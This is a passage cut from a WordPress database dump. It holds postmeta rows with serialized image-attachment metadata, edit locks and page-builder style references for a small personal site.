\"cropped-cropped-cropped-headshot-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"cropped-cropped-cropped-headshot-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D850\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1634662262\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1579,1221,'_oembed_79852ca1990a4c2b625595643f1489dc','{{unknown}}'),(1580,1221,'_edit_lock','1696362919:1'),(1581,1221,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1500;s:6:\"height\";i:1500;s:4:\"file\";s:38:\"cropped-cropped-cropped-headshot-1.jpg\";}}'),(1582,1221,'_edit_last','1'),(1609,138,'_wp_old_date','2022-03-21'),(1611,619,'_wp_old_date','2022-03-21'),(1613,183,'_wp_old_date','2022-03-21'),(1614,186,'_wp_old_date','2022-03-21'),(1666,1281,'is_colibri-wp_front_page','1'),(1667,1281,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1668,1283,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(1673,1288,'is_colibri-wp_front_page','1'),(1674,1288,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1675,1290,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1680,1295,'is_colibri-wp_front_page','1'),(1681,1295,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1682,1297,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1687,1302,'is_colibri-wp_front_page','1'),(1688,1302,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1689,1304,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1698,1311,'is_colibri-wp_front_page','1'),(1699,1311,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1700,1313,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1705,1318,'is_colibri-wp_front_page','1'),(1706,1318,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1707,1320,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:39:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:679;i:31;i:217;i:32;i:218;i:33;i:220;i:34;i:221;i:35;i:222;i:36;i:223;i:37;i:224;i:38;i:225;}}}'),(1712,1325,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:314;i:9;i:321;i:10;i:322;i:11;i:324;i:12;i:317;i:13;i:318;i:14;i:319;i:15;i:292;i:16;i:293;i:17;i:294;i:18;i:295;i:19;i:296;i:20;i:298;}}}'),(1729,1335,'_wp_attached_file','2022/06/IMG_1240-scaled.jpg'),(1730,1335,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2022/06/IMG_1240-scaled.jpg\";s:8:\"filesize\";i:737755;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_1240-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17470;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_1240-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149050;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1240-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"IMG_1240-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149050;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"IMG_1240-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304180;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_1240-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:502879;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_1240.jpg\";}'),(1731,1336,'_wp_attached_file','2022/06/cropped-IMG_1240-scaled-1-e1697205792255.jpg'),(1732,1336,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1910;s:6:\"height\";i:1910;s:4:\"file\";s:52:\"2022/06/cropped-IMG_1240-scaled-1-e1697205792255.jpg\";s:8:\"filesize\";i:544065;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20822;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"cropped-IMG_1240-scaled-1-e1697205792255-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178908;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6756;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108232;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"cropped-IMG_1240-scaled-1-e1697205792255-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356232;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1733,1336,'_oembed_31f3137daa2d9eb3f0f9388b27d3858a','{{unknown}}'),(1746,1348,'_wp_attached_file','2022/08/hu_new-1.jpg'),(1747,1348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2022/08/hu_new-1.jpg\";s:8:\"filesize\";i:14601;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"hu_new-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"hu_new-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4666;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1754,1357,'_wp_attached_file','2022/03/cropped-Ruby-1.jpg'),(1755,1357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2348;s:6:\"height\";i:2348;s:4:\"file\";s:26:\"2022/03/cropped-Ruby-1.jpg\";s:8:\"filesize\";i:813966;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23030;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212184;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6632;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128062;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:418995;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:667653;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1756,1357,'_oembed_0d1092d273662f7dbccbaa492ee23d9f','{{unknown}}'),(1757,1358,'_wp_attached_file','2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg'),(1758,1358,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:50:\"2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg\";s:8:\"filesize\";i:447524;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12911;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5901;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62249;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1759,1358,'_oembed_55bd757842f447f6296ab9cafb9673fd','{{unknown}}'),(1760,1359,'_wp_attached_file','2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg'),(1761,1359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:52:\"2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg\";s:8:\"filesize\";i:447524;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12911;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5901;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62249;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1762,1359,'_oembed_55bd757842f447f6296ab9cafb9673fd','{{unknown}}'),(1771,1369,'_wp_attached_file','2022/11/bayo-e1695781168350.jpeg'),(1772,1369,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:810;s:6:\"height\";i:810;s:4:\"file\";s:32:\"2022/11/bayo-e1695781168350.jpeg\";s:8:\"filesize\";i:78741;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16336;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5215;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84437;}}s:10:\"image_meta\"